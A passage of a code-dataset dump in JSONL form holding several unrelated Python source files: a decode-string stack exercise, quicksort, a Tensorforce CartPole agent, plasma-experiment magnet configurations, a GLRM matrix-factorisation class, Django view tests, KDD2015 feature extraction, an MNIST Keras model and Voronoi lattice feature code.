guaranteed to be a positive integer.\n\nYou may assume that the input string is always valid; No extra white spaces, square brackets are well-formed, etc.\n\nFurthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].\n\nExamples:\n\ns = \"3[a]2[bc]\", return \"aaabcbc\".\ns = \"3[a2[c]]\", return \"accaccacc\".\ns = \"2[abc]3[cd]ef\", return \"abcabccdcdcdef\".\n\"\"\"\n\ndef qn11(str):\n\tstack = []\n\tres = \"\"\n\tfor c in str:\n\t\tif len(stack) == 0 or c != \"]\":\n\t\t\tstack.append(c)\n\t\telse:\n\t\t\tcur = \"\"\n\t\t\twhile stack[-1] != \"[\":\n\t\t\t\tcur = stack.pop() + cur\n\t\t\t#pop \"[\"\n\t\t\tstack.pop()\n\t\t\tcounter = \"\"\n\t\t\twhile len(stack) >0 and stack[-1] in string.digits:\n\t\t\t\tcounter = stack.pop() + counter\n\t\t\tcur = cur * int(counter)\n\t\t\tstack.append(cur)\n\tfor c in stack:\n\t\tres += c\n\treturn res\ns = \"3[a]2[bc]\"\nprint(qn11(s))\n\ns = \"3[a2[c]]\"\nprint(qn11(s))\n\ns = \"2[abc]3[cd]ef\"\nprint(qn11(s))\ns = \"100[a]\"\nprint(qn11(s))","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":16371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"422530185","text":"#!/usr/bin/env python3\n# encoding: utf-8\n# Public Domain\n\n\ndef quick_sort(t):\n\tif len(t) < 2:\n\t\treturn t\n\t\n\t# copy the list (don't modify it)\n\tt = t[:]\n\t\n\t# pick the middle element as the pivot\n\tpivot = t.pop((len(t) - 1)//2)\n\t\n\tleft = list(filter(lambda x: x < pivot, t))\n\tright = list(filter(lambda x: x >= pivot, t))\n\t\n\treturn quick_sort(left) + [pivot] + quick_sort(right)\n\n\nif __name__ == '__main__':\n\timport random\n\tnums = [random.randrange(100) for _ in range(20)]\n\t\n\tprint(quick_sort(nums))","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278048501","text":"from tensorforce import Agent, Environment\r\nfrom tensorforce.agents import PPOAgent\r\nfrom tensorforce.environments import OpenAIGym\r\n\r\n# Pre-defined or custom environment\r\n# environment = Environment.create(\r\n# environment='gym', level='CartPole', max_episode_timesteps=500\r\n# )\r\n\r\n# Network as list of layers\r\nnetwork_spec = [\r\n dict(type='dense', size=32, activation='tanh'),\r\n dict(type='dense', size=32, activation='tanh')\r\n]\r\n\r\nenvironment = OpenAIGym('CartPole-v0', visualize=True, max_episode_steps=500)\r\n\r\n\r\n# Instantiate a Tensorforce agent\r\n# agent = Agent.create(\r\n# agent='tensorforce',\r\n# environment=environment, # alternatively: states, actions, (max_episode_timesteps)\r\n# memory=10000,\r\n# update=dict(unit='timesteps', batch_size=64),\r\n# optimizer=dict(type='adam', learning_rate=3e-4),\r\n# policy=dict(network='auto'),\r\n# objective='policy_gradient',\r\n# reward_estimation=dict(horizon=20)\r\n# )\r\n\r\nagent = Agent.create(\r\n agent='ppo', environment=environment, batch_size=10, learning_rate=1e-3\r\n)\r\n\r\n# agent = PPOAgent(\r\n# states_spec=environment.states,\r\n# actions_spec=environment.actions,\r\n# network_spec=network_spec,\r\n# batch_size=4096,\r\n# # BatchAgent\r\n# keep_last_timestep=True,\r\n# # PPOAgent\r\n# step_optimizer=dict(\r\n# type='adam',\r\n# learning_rate=1e-3\r\n# ),\r\n# optimization_steps=10,\r\n# # Model\r\n# scope='ppo',\r\n# discount=0.99,\r\n# # DistributionModel\r\n# distributions_spec=None,\r\n# entropy_regularization=0.01,\r\n# # PGModel\r\n# baseline_mode=None,\r\n# baseline=None,\r\n# baseline_optimizer=None,\r\n# gae_lambda=None,\r\n# # PGLRModel\r\n# likelihood_ratio_clipping=0.2,\r\n# # summary_spec=None,\r\n# # distributed_spec=None\r\n# )\r\n\r\n# Train for 300 episodes\r\nfor _ in range(300):\r\n\r\n # Initialize episode\r\n states = environment.reset()\r\n terminal = False\r\n\r\n while not terminal:\r\n # Episode timestep\r\n actions = agent.act(states=states)\r\n states, terminal, reward = environment.execute(actions=actions)\r\n agent.observe(terminal=terminal, reward=reward)\r\n\r\nagent.close()\r\nenvironment.close()\r\n","sub_path":"Tensorforce/tf_main.py","file_name":"tf_main.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"77788996","text":"import numpy as np\nimport os\nimport warnings\nfrom matplotlib.patches import Polygon, Wedge\nfrom matplotlib.collections import PatchCollection\nimport matplotlib as mpl\n\nfrom pleiades import (Current, CurrentGroup, Magnet, Component, ZSymmCoilSet,\n MagnetGroup, CurrentArray, Configuration)\n\nclass TREXcoil(CurrentGroup):\n def __init__(self,**kwargs):\n z0 = float(kwargs.pop(\"z0\",0))\n self._z0 = z0\n Rarr = 2.00467 + np.linspace(0, .067083, 6)\n Zarr = np.linspace(-.105469,.105469, 16)\n rz_pts = []\n for i, r in enumerate(Rarr):\n if i == 5:\n rz_pts.extend([(r, z0 + z) for z in (Zarr[0::2]+Zarr[1::2])/2])\n else:\n rz_pts.extend([(r, z0 + z) for z in Zarr])\n# for i, z in enumerate(Zarr):\n# if np.mod(i, 2) == 0:\n# rz_pts.extend([(r, z0 + z) for r in Rarr])\n# else:\n# rz_pts.extend([(r, z0 + z) for r in Rarr[0:5]])\n rz_pts = np.array(rz_pts)\n super_kwargs = {\"rz_pts\":rz_pts,\"patchcls\":Polygon,\"fc\":\".35\",\"ec\":\"k\"}\n super_kwargs.update(kwargs)\n super(TREXcoil,self).__init__(**super_kwargs)\n\n @property\n def z0(self):\n return self._z0\n\n @z0.setter\n def z0(self,new_z0):\n dz = new_z0 - self._z0\n super(TREXcoil,self).translate((0,dz))\n self._z0 = new_z0\n\n def build_patchargs(self,**kwargs):\n z0 = self._z0\n left,right = 2.00467, 2.00467 + .067083\n bottom, top = z0 - .105469, z0 + .105469\n return (np.array([[left,bottom],[left,top],[right,top],[right,bottom]]),)\n\nclass TREXCoils(Component):\n def __init__(self,**kwargs):\n ###### Build TREX coils\n super(TREXCoils,self).__init__()\n z0 = float(kwargs.pop(\"z0\",1.1757))\n labels = kwargs.pop(\"labels\",[\"Ncoil\",\"Scoil\"])\n currents = np.array(kwargs.pop(\"currents\",(1,1)),dtype=\"float\")\n nprocs = kwargs.pop(\"nprocs\",[4,4])\n patch_mask = kwargs.pop(\"patch_mask\",[0,0])\n grid = kwargs.pop(\"grid\",None)\n Scoil = TREXcoil(z0=-z0,**kwargs)\n Ncoil = TREXcoil(z0=z0,**kwargs)\n self.groups = [Ncoil,Scoil]\n self.labels = labels\n self.currents = currents\n self.nprocs = nprocs\n self.patch_mask = [0,0]\n\nclass LTRXCoils(ZSymmCoilSet):\n def __init__(self,**kwargs):\n dr,dz = 0.010583333,0.01031667\n nr,nz = 10,13\n r0,z0 = 0.185725,1.6367\n super_kwargs = {\"r0\":r0,\"z0\":z0,\"dr\":dr,\"dz\":dz,\"labels\":[\"Scoil\",\"Ncoil\"],\n \"patchcls\":Polygon,\"fc\":\".35\",\"ec\":\"k\"}\n super_kwargs.update(kwargs)\n super(LTRXCoils,self).__init__(**super_kwargs)\n\nclass VesselMagnets(Component):\n def __init__(self,**kwargs):\n super(VesselMagnets,self).__init__()\n labels = kwargs.pop(\"labels\",[\"Npole\",\"bulk\",\"Spole\"])\n nprocs = kwargs.pop(\"nprocs\",[1,12,1])\n currents = kwargs.pop(\"currents\",[2710.68,2710.68,2710.68])\n patch_mask = kwargs.pop(\"patch_mask\",[0,0,0])\n height = 1 * .0254\n width = 1.5 * .0254\n # first group\n z = 1.5117\n r = .0768\n kwargs.update({\"fc\":\"b\"})\n m1 = MagnetGroup(rz_pts=[(r,z)],mu_hats=[0],height=height,width=width,**kwargs)\n # second group\n R = 1.514475\n Theta = np.linspace(7.5, 172.5, 34)\n rpts,zpts = R*np.sin(np.deg2rad(Theta)),R*np.cos(np.deg2rad(Theta))\n rz_pts = np.vstack((rpts,zpts)).T\n mu_hats = Theta + np.mod(np.arange(1, 35), 2) * 180\n m2 = MagnetGroup(rz_pts=rz_pts,mu_hats=mu_hats,height=height,width=width,**kwargs)\n for m_obj in m2.obj_list[::2]:\n m_obj.patchkwargs[\"fc\"]=\"r\"\n # third group\n z = -1.5117\n r = .0768\n kwargs.update({\"fc\":\"r\"})\n m3 = MagnetGroup(rz_pts=[(r,z)],mu_hats=[0],height=height,width=width,**kwargs)\n self.groups = [m1,m2,m3]\n self.labels = labels\n self.nprocs = nprocs\n self.patch_mask = patch_mask\n self.currents = currents\n self.update_patches()\n\n @Component.patches.getter\n def patches(self):\n plist = [group.patches for group,mask in zip(self._groups,self._patch_mask) if not mask]\n return [p for sublist in plist for p in sublist]\n\nclass Dipole(Component):\n \"\"\"Internal dipole Magnet comprised of 2 cylindrical SmCo magnets.\n\n Attributes:\n magnets (list): list of Magnet objects comprising this instance\n patches (list of matplotlib.patches.Polygon instances): patches representing the vessel magnets\n \"\"\"\n\n def __init__(self, **kwargs):\n super(Dipole,self).__init__()\n r0,z0 = kwargs.pop(\"loc\",(0,0))\n muhat = kwargs.pop(\"muhat\",0)\n labels = kwargs.pop(\"labels\",[\"dipole\"])\n nprocs = kwargs.pop(\"nprocs\",[1])\n currents = kwargs.pop(\"currents\",[2901.0])\n patch_mask = kwargs.pop(\"patch_mask\",[0])\n # Build internal dipole magnets\n width = (2.75 / 2 - .125) * .0254\n height = 2.5 / 2 * .0254\n delta = (1.25 / 2 + .125) * .0254\n r1 = r0 + .125 * .0254 + width / 2.0 # + delta*np.sin(np.pi*mu_hat/180.0)\n r2 = r1 # rho0 - delta*np.sin(np.pi*mu_hat/180.0)\n z1 = z0 + delta # *np.cos(np.pi*mu_hat/180.0)\n z2 = z0 - delta # *np.cos(np.pi*mu_hat/180.0)\n m1 = MagnetGroup(rz_pts=[(r1,z1),(r2,z2)],mu_hats=[muhat,muhat],height=height,width=width,current=currents[0],**kwargs)\n self.groups = [m1]\n self.labels = labels\n self.nprocs = nprocs\n self.patch_mask = patch_mask\n self.currents = currents\n self.update_patches()\n \n @Component.patches.getter\n def patches(self):\n plist = [group.patches for group,mask in zip(self._groups,self._patch_mask) if not mask]\n return [p for sublist in plist for p in sublist]\n\nclass BRB(Configuration):\n def __init__(self,**kwargs):\n super(BRB,self).__init__()\n self.add_component(TREXCoils(),\"trex\")\n self.add_component(LTRXCoils(),\"ltrx\")\n self.add_component(VesselMagnets(),\"vessel_mags\")\n self.grid = kwargs.pop(\"grid\",None)\n self.artists = [Wedge((0,0),1.556,0,360,width=.032,fc=\".35\",ec=\"k\",zorder=100)]\n\n def add_cathode(self):\n raise NotImplementedError(\"Can't add cathodes to BRB yet\")\n\n def add_anode(self):\n raise NotImplementedError(\"Can't add anode to BRB yet\")\n\n def add_sweep(self,center,r,theta1,theta2,width=None,**kwargs):\n self.patches.append(Wedge(center,r,theta1,theta2,width=width,**kwargs))\n\nclass LTRX(Configuration):\n def __init__(self,**kwargs):\n super(LTRX,self).__init__()\n zc = 2.811\n self.add_component(CoilPack(r0=.286,z0=1.173-zc,nr=16,nz=16,dr=0.0135,dz=0.0135,fc=\".35\",ec=\"k\"),\"coil_1\")\n for i in range(2,8):\n z_i = 1.173+.278 + (i-2)*.214 - zc\n coil_i = CoilPack(r0=.381,z0=z_i,nr=12,nz=8,dr=0.0127,dz=0.0127,fc=\".35\",ec=\"k\")\n self.add_component(coil_i,\"coil_{0}\".format(i))\n self.add_component(CoilPack(r0=.286,z0=2.811-zc,nr=16,nz=16,dr=0.0135,dz=0.0135,fc=\".35\",ec=\"k\"),\"coil_8\")\n# self.add_component(CoilPack(r0=.53,z0=3.3,nr=3,nz=6,dr=0.01,dz=0.01,fc=\".35\",ec=\"k\"),\"coil_9\")\n# self.add_component(CoilPack(r0=.53,z0=5.3,nr=3,nz=6,dr=0.01,dz=0.01,fc=\".35\",ec=\"k\"),\"coil_10\")\n\n self.grid = kwargs.pop(\"grid\",None)\n\n\n\nclass PCX_HH(object):\n \"\"\"PCX Helmholtz coil set\n\n Attributes:\n t_current (double): current through top HH coil\n b_current (double): current through bottom HH coil\n fc (str): facecolor for patch\n top_coil (CurrentArray): CurrentArray object for top coil\n bot_coil (CurrentArray): CurrentArray object for bottom coil\n current_objs (list): list of Current objects comprising this instance\n patches (list of matplotlib.patches.Polygon instances): patches representing the PCX HH coils\n \"\"\"\n\n def __init__(self, t_current, b_current, fc='0.35'):\n ## Build PCX HH coils\n N=89. #number of windings (guess...)\n self.t_current = t_current * N\n self.b_current = b_current * N\n self.fc = fc\n R = 75.8825/100.\n ztop = 38.03142/100.\n zbot = -37.85616/100.\n w = 10.795/100.\n h = 10.16/100.\n self.top_coil = Current((R, ztop), self.t_current, frame=\"rhoz\", units=\"m\")\n self.bot_coil = Current((R, zbot), self.b_current, frame=\"rhoz\", units=\"m\")\n self.current_objs = [self.top_coil, self.bot_coil]\n top_coil_patch = Polygon([(R-w/2.,ztop-h/2.),(R-w/2., ztop+h/2.), (R+w/2., ztop+h/2.), (R+w/2., ztop-h/2.)],\n closed=True, fc=self.fc, ec='k')\n bot_coil_patch = Polygon([(R-w/2.,zbot-h/2.),(R-w/2., zbot+h/2.), (R+w/2., zbot+h/2.), (R+w/2., zbot-h/2.)],\n closed=True, fc=self.fc, ec='k')\n self.patches = [top_coil_patch, bot_coil_patch]\n\n def get_current_objs(self):\n return self.current_objs\n\n def get_current_tuples(self, frame='rhoz', units='m'):\n assert frame.lower() in ['polar', 'rhoz'], \"Invalid frame choice: {0}\".format(frame)\n assert units.lower() in ['m', 'cm'], \"Invalid units choice: {0}\".format(units)\n return [c_obj.get_current_tuples(frame=frame, units=units)[0] for c_obj in self.current_objs]\n\n\nclass PCX_magCage(object):\n \"\"\"Represent an array of dipole magnets that comprise the PCX magnet cage.\n\n Attributes:\n magnets (list): list of Magnet objects comprising this instance\n patches (list of matplotlib.patches.Polygon instances): patches representing the cage magnets\n \"\"\"\n\n def __init__(self, current_mags=None):\n ### Build the magnet array ###\n height = 1.905 # cm\n width = 1.905 # cm\n # all positions relative to origin of the vessel, ref: gdrive sheet\n # [TS1,TS2,TS3,TS4,TS5,TS6,TS7,TS8,TA,S14,S13,S12,S11,S10,S9,S8,S7,\n # S6,S5,S4,S3,S2,S1,BA,BS8,BS7,BS6,BS5,BS4,BS3,BS2,BS1]\n R = np.array([4.1275, 9.8425, 15.5575, 21.2725, 26.9875, 32.7025, 38.4175, 44.1325, 46.6598, 46.25975, 46.25975,\n 46.25975,46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975, 46.25975,\n 46.25975,46.25975, 46.6598, 44.1325, 38.4175, 32.7025, 26.9875, 21.2725, 15.5575, 9.8425, 4.1275])\n Z = np.array([50.2335, 50.2335, 50.2335, 50.2335, 50.2335, 50.2335, 50.2335, 50.2335,49.0512,46.2645,40.0959,\n 33.9273,27.7587,21.5901,15.4215,9.2529,3.0843,-3.0843,-9.2529,-15.4215,-21.5901,-27.7587,-33.9273,\n -36.7139,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965,-37.8965])\n muHats = np.array([180.,0.,180.,0.,180.,0.,180.,0.,135.,270.,90.,270.,90.,270.,90.,270.,90.,270.,90.,270.,90.,270.,\n 90.,225.,0.,180.,0.,180.,0.,180.,0.,180.])\n if current_mags == None:\n current_mags = np.ones(10)\n n = len(current_mags) / (height / 100.0)\n ## MPDX strengths\n current_mags *= .4 / (4 * np.pi * 10 ** -7 * n)\n current_mags *= 3.3527\n self.magnets = []\n self.patches = []\n for i, (r, z, h) in enumerate(zip(R, Z, muHats)):\n if np.mod(i,2):\n fc = \"b\"\n else:\n fc = \"r\"\n m = Magnet((r, z), current_mags=current_mags, width=width, height=height, frame='rhoz', units=\"cm\",\n mu_hat=h, fc= fc)\n self.magnets.append(m)\n self.patches.append(m.patch)\n\n def set_strength(self, current_mags):\n \"\"\"Set strength of each magnet with 1D array current_mags\"\"\"\n for m in self.magnets:\n m.set_currents(current_mags)\n\n def get_current_tuples(self, frame='rhoz', units='m'):\n \"\"\"Return computationally relevant info: list of (rho, z, current) tuples for instance.\"\"\"\n assert frame.lower() in [\"polar\", \"rhoz\"], \"Invalid frame choice: {0}\".format(frame)\n assert units.lower() in [\"m\", \"cm\"], \"Invalid units choice: {0}\".format(units)\n return [c_obj.get_current_tuples(frame=frame, units=units)[0] for c_obj in self.magnets]\n\n def set_magnets(self, current_mags):\n self.magnets = []\n self.patches = []\n self.current_mags = current_mags\n for i, (r, zz, h) in enumerate(zip(self.r, self.z, self.muHats)):\n if np.mod(i, 2):\n fc = \"r\"\n else:\n fc = \"b\"\n m = Magnet((r, zz), current_mags=current_mags, width=width, height=height, frame='rhoz',\n units='cm', mu_hat=h, fc=fc)\n self.magnets.append(m)\n self.patches.append(m.patch)\n\n def set_strength(self, current_mags):\n \"\"\"Set strength of each magnet with 1D array current_mags\"\"\"\n self.current_mags = current_mags\n for m in self.magnets:\n m.set_currents(current_mags)\n\n\nclass PhilipsMRI(object):\n def __init__(self, loc, current):\n rho0, z0 = loc\n delta_rho = .01\n delta_z = .01\n nz = 1.5 // delta_z\n nrho = .05 // delta_rho\n z1 = nz / 2 * delta_z\n ## dimensions of cryostats\n inner_r = .930 / 2.0\n outer_r = 1.88 / 2.0\n length = 1.618\n verts = np.array([[inner_r,z0+length/2.0],[outer_r,z0+length/2.0],[outer_r,z0-length/2.0],[inner_r,z0-length/2.0]])\n self.cryo = Polygon(verts,closed=True,fc=\"None\",ec=\"k\",lw=2,joinstyle=\"round\")\n self.coil = CurrentArray((rho0,z0-z1),nrho,nz,delta_rho,delta_z,current,fc=\".45\",units=\"m\")\n self.patches = [self.cryo,self.coil.patch]\n\n def get_current_tuples(self,frame=\"rhoz\",units=\"m\"):\n return self.coil.get_current_tuples(frame=frame,units=units)\n\n\ndef build_pcx(vessel=True, HH=(False, 0, 0)):\n \"\"\"\"Return field objects and patches representing PCX (modified copy of\n build_wipal).\n\n Parameters\n ----------\n vessel : bool\n Boolean to include vessel magnets or not, default True\n HH : tuple\n Tuple of (bool,float,float) representing whether or not to include\n helmholtz coil set and, if so, how much current goes into the upper and\n lower coil, respectively default (False,0,0)\n \"\"\"\n patches = []\n current_objs = []\n if vessel:\n vessel_magnets = PCX_magCage()\n current_objs.extend(vessel_magnets.magnets)\n patches += vessel_magnets.patches\n if HH[0]:\n top_current = HH[1]\n bot_current = HH[2]\n hh_coils = PCX_HH(top_current, bot_current)\n current_objs.extend(hh_coils.get_current_objs())\n patches.extend(hh_coils.patches)\n return current_objs, patches\n\ndef build_gdt():\n rho0 = 40\n n_rho = 20\n n_z = 100\n delta_rho = 1\n delta_z = 1\n coil_1 = CurrentArray((rho0, -325), n_rho, n_z, delta_rho, delta_z, 1500, units=\"cm\")\n coil_2 = CurrentArray((rho0, -215), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_3 = CurrentArray((rho0, -105), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_4 = CurrentArray((rho0, 5), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_5 = CurrentArray((rho0, 115), n_rho, n_z, delta_rho, delta_z, 500, units=\"cm\")\n coil_6 = CurrentArray((rho0, 225), n_rho, n_z, delta_rho, delta_z, 1500, units=\"cm\")\n coil_7 = CurrentArray((rho0 / 2.0, -395), 10, 50, delta_rho, delta_z, 30000, units=\"cm\")\n coil_8 = CurrentArray((rho0 / 2.0, 345), 10, 50, delta_rho, delta_z, 30000, units=\"cm\")\n current_objs = [coil_1, coil_2, coil_3, coil_4, coil_5, coil_6, coil_7, coil_8]\n patches = [coil_1.patch, coil_2.patch, coil_3.patch, coil_4.patch, coil_5.patch, coil_6.patch, coil_7.patch,\n coil_8.patch]\n\n return current_objs, patches\n","sub_path":"pleiades/wipplsystems.py","file_name":"wipplsystems.py","file_ext":"py","file_size_in_byte":15856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206700785","text":"import cvxpy as cp\nimport numpy as np\nfrom .util import missing2mask\nfrom .convergence import *\nimport sys\n\n\nclass GLRM:\n def __init__(\n self, A, loss_list, k, regX=None, regY=None, missing_list=None, scale=True\n ):\n self.scale = scale\n self.k = k\n self.A = A\n self.loss_list = loss_list\n self.missing_list = missing_list\n self.regX = regX\n self.regY = regY\n self.converged = Convergence()\n self.vals = []\n self.niter = 0\n if missing_list is not None:\n self.mask = missing2mask(A.shape, missing_list)\n else:\n self.mask = np.ones_like(A, dtype=np.bool)\n if self.scale:\n self.calc_scaling()\n else:\n self.mu = ones(A.shape[1])\n self.sigma = ones(A.shape[1])\n self._initialize_probs()\n\n def calc_scaling(self):\n self.mu = np.zeros(self.A.shape[1])\n self.sigma = np.zeros(self.A.shape[1])\n for columns, loss_fxn in self.loss_list:\n for col in columns:\n elems = self.A[:, col][self.mask[:, col]]\n alpha = cp.Variable()\n prob = cp.Problem(cp.Minimize(loss_fxn(elems, alpha)))\n self.sigma[col] = prob.solve() / len(\n elems\n ) # len(elems)-1 per the paper?\n self.mu[col] = alpha.value\n\n def _initialize_probs(self):\n m = self.A.shape[0]\n n = self.A.shape[1]\n\n self.Xp = cp.Parameter((m, self.k))\n self.Xv = cp.Variable((m, self.k))\n\n self.Yp = cp.Parameter((self.k, n))\n self.Yv = cp.Variable((self.k, n))\n\n # Random Intialization\n self.Xv.value = np.random.rand(m, self.k)\n self.Xp.value = np.random.rand(m, self.k)\n\n self.Yp.value = np.random.rand(self.k, n)\n self.Yv.value = np.random.rand(self.k, n)\n self._initialize_XY()\n self.objX = 0\n self.objY = 0\n Zx = self.Xv @ self.Yp\n Zy = self.Xp @ self.Yv\n for col, loss_fxn in self.loss_list:\n Acol = self.A[:, col][self.mask[:, col]]\n Zxcol = Zx[:, col][self.mask[:, col]]\n Zycol = Zy[:, col][self.mask[:, col]]\n\n # Acol\n # print(col)\n # print((Acol,Zx[:,col]+self.mu[col].shape)\n self.objX += loss_fxn(Acol, Zxcol + self.mu[col]) / self.sigma[col]\n self.objY += loss_fxn(Acol, Zycol + self.mu[col]) / self.sigma[col]\n\n if self.regX is not None:\n self.objX += self.regX(self.Xv)\n if self.regY is not None:\n self.objY += self.regY(self.Yv)\n self.probX = cp.Problem(cp.Minimize(self.objX))\n self.probY = cp.Problem(cp.Minimize(self.objY))\n\n def _initialize_XY(self):\n B = (self.A - self.mu) / self.sigma\n B[~self.mask] = 0\n\n U, s, Vh = np.linalg.svd(B, full_matrices=False)\n S = np.diag(s)\n\n X0 = (U @ S)[:, : self.k]\n Y0 = (S @ Vh)[: self.k, :]\n\n self.Xv.value = np.copy(X0)\n self.Xp.value = np.copy(X0)\n\n self.Yv.value = np.copy(Y0)\n self.Yp.value = np.copy(Y0)\n\n def fit(self, solver=cp.ECOS, verboseX=False, verboseY=False, verbose=False):\n if verbose:\n verboseX = True\n verboseY = True\n print(\"iter \\t objY\")\n while not self.converged:\n\n self.converged.objX.append(self.probX.solve(solver, verbose=verbose))\n self.Xp.value = np.copy(self.Xv.value)\n\n self.converged.objY.append(self.probY.solve(solver, verbose=verbose))\n self.Yp.value = np.copy(self.Yv.value)\n self.vals.append(self.objY.value)\n sys.stdout.write(\n f\"\\r {self.niter} \\t {np.round(self.converged.objY[-1],2)}\"\n )\n sys.stdout.flush()\n self.niter += 1\n\n return self.Xp.value, self.Yp.value\n\n def predict(self):\n return (self.Xp @ self.Yp).value + self.mu\n\n def plot_convergence(self, **kwargs):\n self.converged.plot(**kwargs)\n","sub_path":"glrm/glrm.py","file_name":"glrm.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"32657297","text":"from django.test import TestCase\n\n\nclass MyTest(TestCase):\n\n def test_loading_index(self):\n response = self.client.get('/', follow_redirects=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed('index.html')\n \n def test_loading_about_us(self):\n response = self.client.get('/about_us/', follow_redirects=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed('about.html')\n","sub_path":"home/tests_views.py","file_name":"tests_views.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"465379608","text":"from numpy import *\nfrom csv import *\nfrom pandas import *\n\n########store id and label into label[id,label]#######################################\n \nwith open('truth_train.csv') as trf:\n label = dict(reader(trf));\n\n################## pandas #############################################################\n\ntrainset = open('kddtrain_v3.csv', 'w');\ntrainset.write(\"enrollment_id,ndate,study_days,label\\n\");\n\ndf = DataFrame.from_csv('new_log_train.csv',index_col=False)\nidx_dict = df['enrollment_id'].value_counts().to_dict()\n\nfor key in idx_dict:\n selt = df[df['enrollment_id']==key]\n event_stat = selt['event'].value_counts().to_dict();\n datedict = selt.date.value_counts().to_dict(); \n datelist = datedict.keys();\n dhour = 0;\n for datekey in datelist:\n perday = df[(df.enrollment_id==key) & (df.date==datekey)];\n delta = max(to_datetime(perday.time)) - min(to_datetime(perday.time));\n dhour = dhour + round(delta/np.timedelta64(1,'D'),3)\n \n ndate = selt['date'].nunique();\n lab = label.get(str(key)); \n trainset.write(str(key)+\",\"+str(ndate)+\",\"+str(dhour)+\",\"+str(lab)+\"\\n\") \n","sub_path":"Kdd2015/Feature_extractor/extractor_v3.py","file_name":"extractor_v3.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317740097","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2019-08-12 16:32\n@Author : 比尔丶盖子\n@Email : 914138410@qq.com\n\"\"\"\nimport tensorflow as tf\nfrom util.mnist import load_mnist\n\n\"\"\"\nacc = 96.81%\n\"\"\"\ntf.random.set_seed(1)\nmodel = tf.keras.Sequential([tf.keras.layers.Dense(784, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, activation='softmax')])\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.001),\n loss=tf.keras.losses.categorical_crossentropy,\n metrics=[tf.keras.metrics.categorical_accuracy])\n\ntrain_image, train_label, test_image, test_label = load_mnist()\n\nmodel.fit(train_image, train_label, epochs=1)\ntest_loss, test_acc = model.evaluate(test_image, test_label)\nprint(test_acc)\n","sub_path":"attempt/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"311976954","text":"from features_extraction import *\r\nfrom build_crystal_lattice import *\r\nfrom scipy.spatial import Voronoi\r\n#import matplotlib.pyplot as plt\r\nfrom Data_save_load import *\r\n\r\ndef q_l6m_tilt_fun(q_l6_m):#input list for 1 paritcle\r\n q_l6_m = np.array(q_l6_m)\r\n s = np.sum(pow(abs(q_l6_m), 2))\r\n q_l6_m_tile = q_l6_m / math.sqrt(s)\r\n return q_l6_m_tile.tolist()\r\n#test\r\n#a=[1,2,3]\r\n#b = q_l6m_tilt_fun(a)\r\n#print(np.array(a) / math.sqrt(14))\r\n\r\n\r\ndef disorder_fun(ref_P_ql6m_tilt, NN_index, particle_index, ql6m_tilt):#list\r\n NN_ql6m = []\r\n ref_P_ql6m_tilt = np.array(ref_P_ql6m_tilt)\r\n ql6m_tilt = np.array(ql6m_tilt)\r\n\r\n for item in NN_index:\r\n NN_ql6m.append(ql6m_tilt[particle_index.index(item)])\r\n\r\n s = 0\r\n for item in NN_ql6m:\r\n s = s + np.dot(ref_P_ql6m_tilt, np.conj(item))\r\n s = s / float(len(NN_index))\r\n return np.around(s, 2)\r\n\r\ndef disorder_filter(particle, cache_NN, cache_ql6m, features): #input complete info list particle [(index, [coordiante]),...], cahce_NN [[indices],...], chace_ql6m[[],...], features [[],...]\r\n ql6m_tilt = [q_l6m_tilt_fun(item) for item in cache_ql6m]\r\n unfilterable_particle = []\r\n filtered_particle = []\r\n filtered_features = []\r\n disorders = []\r\n\r\n index, particle_position = zip(*particle)\r\n for i in range(len(cache_NN)):\r\n if set(cache_NN[i]) < set(index):\r\n s = disorder_fun(cache_ql6m[i], cache_NN[i], index, ql6m_tilt)\r\n filtered_particle.append(particle[i])\r\n filtered_features.append(features[i])\r\n disorders.append(np.around(s, 3))\r\n else:\r\n unfilterable_particle.append([particle[i], features[i]])\r\n\r\n return filtered_particle, filtered_features, disorders, unfilterable_particle # filtered_particle list [(index,[coordinate]),...], filtered_features list[[],...], disorders list [...], unfilterable_particle list [[(index, [coordinate]),[feature]],...]\r\n\r\n\r\ndef pre_processing(crystal_lattice):\r\n particle = []\r\n particle_eliminated = []\r\n features = []\r\n cache_NN_index = []\r\n cache_q_l6_m = []\r\n\r\n lattice_voronoi = Voronoi(crystal_lattice)\r\n\r\n points = lattice_voronoi.points\r\n point_region = lattice_voronoi.point_region\r\n regions = lattice_voronoi.regions\r\n vertices = lattice_voronoi.vertices\r\n ridge_points = lattice_voronoi.ridge_points\r\n ridge_vertices = lattice_voronoi.ridge_vertices\r\n\r\n for i in range(len(points)):\r\n region_index = point_region[i]\r\n cell = regions[region_index]\r\n if -1 in cell:\r\n particle_eliminated.append((i, points[i].tolist()))\r\n else:\r\n particle.append((i, points[i].tolist()))\r\n h_dis, h_angle, 